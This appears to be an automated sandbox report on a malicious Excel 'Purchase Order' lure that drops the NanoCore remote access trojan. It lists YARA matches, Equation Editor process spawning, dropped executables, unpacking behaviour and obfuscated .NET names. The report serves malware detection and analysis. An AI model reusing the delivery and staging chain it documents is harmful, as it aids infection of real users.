Source: 7.2.opjlpsercy.exe.3346174.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.57e0000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.57e0000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.4c60000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.4c60000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.57b0000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.57b0000.29.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.5070000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.5070000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.33c9f42.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.33c9f42.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.vbc.exe.33d6174.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.33d6174.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: opjlpsercy.exe, 00000006.00000002.2196046125.0000000002C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@10/29@58/2

Source: C:\Users\Public\vbc.exe	Code function: 5_2_005C1172 AdjustTokenPrivileges,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_005C113B AdjustTokenPrivileges,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar,

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Purchase Order Price List 061021.xlsx

Jump to behavior

Source: C:\Users\Public\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\Public\vbc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{4614bd42-26c0-4da0-8e09-16890d37c1d7}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD9AB.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe 'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe'
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process created: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe 'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe 'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Process created: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe 'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe'

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: Purchase Order Price List 061021.xlsx

Static file information: File size 1253640 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: Uindows\System.pdbpdbtem.pdb source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: System.pdb H~t source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbT source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.2153150700.0000000009C90000.00000004.00000001.sdmp, opjlpsercy.exe, 00000006.00000003.2190074429.0000000002850000.00000004.00000001.sdmp
Source:	Binary string: >Usymbols\dll\System.pdb8 source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: vbc.exe, 00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: vbc.exe, 00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: UT32pC:\Windows\System.pdb4 source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: .pdbf source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: C:\Win.pdbassembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: vbc.exe, 00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: vbc.exe, 00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: System.pdb source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: System.pdb8 source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: vbc.exe, 00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: vbc.exe, 00000005.00000002.2358191649.0000000004910000.00000002.00000001.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.]x source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp

Source: Purchase Order Price List 061021.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Purchase Order Price List 061021.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\Public\vbc.exe	Unpacked PE file: 5.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Unpacked PE file: 7.2.opjlpsercy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe

Unpacked PE file: 7.2.opjlpsercy.exe.4430000.10.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\Public\vbc.exe	Unpacked PE file: 5.2.vbc.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Unpacked PE file: 7.2.opjlpsercy.exe.400000.0.unpack

.NET source code contains potential unpacker

Show sources

Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\Public\vbc.exe	Code function: 4_2_72FE2F60 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401F16 push ecx; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0029989B push ecx; retf 0029h
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00299D20 pushad ; retf
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00299D1C push eax; retf
Source: C:\Users\Public\vbc.exe	Code function: 5_2_057A0E00 push C3049078h; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00401F16 push ecx; ret
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 6_2_70D02F60 push eax; ret
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_00401F16 push ecx; ret
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3A28 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3D39 push eax; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3831 push ebp; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3B09 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3D01 push ecx; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3719 push edi; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3911 push ebp; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3A61 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3B79 push edx; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D1D78 pushad ; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D1D78 pushad ; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3949 push esp; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3B41 push edx; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3C59 push ecx; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3751 push esi; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D7F51 push cs; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D36A9 push edi; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3DA9 push eax; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D2DAA pushad ; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3AA4 push ebx; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D38A1 push ebp; iretd
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_002D3BB1 push edx; iretd

Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 5.2.vbc.exe.44c0000.10.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.2.opjlpsercy.exe.4430000.10.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsjBD87.tmp\System.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	Jump to dropped file
